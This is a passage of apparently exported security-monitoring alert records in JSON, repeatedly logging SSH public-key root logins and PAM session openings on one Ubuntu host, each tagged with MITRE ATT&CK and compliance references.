opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} 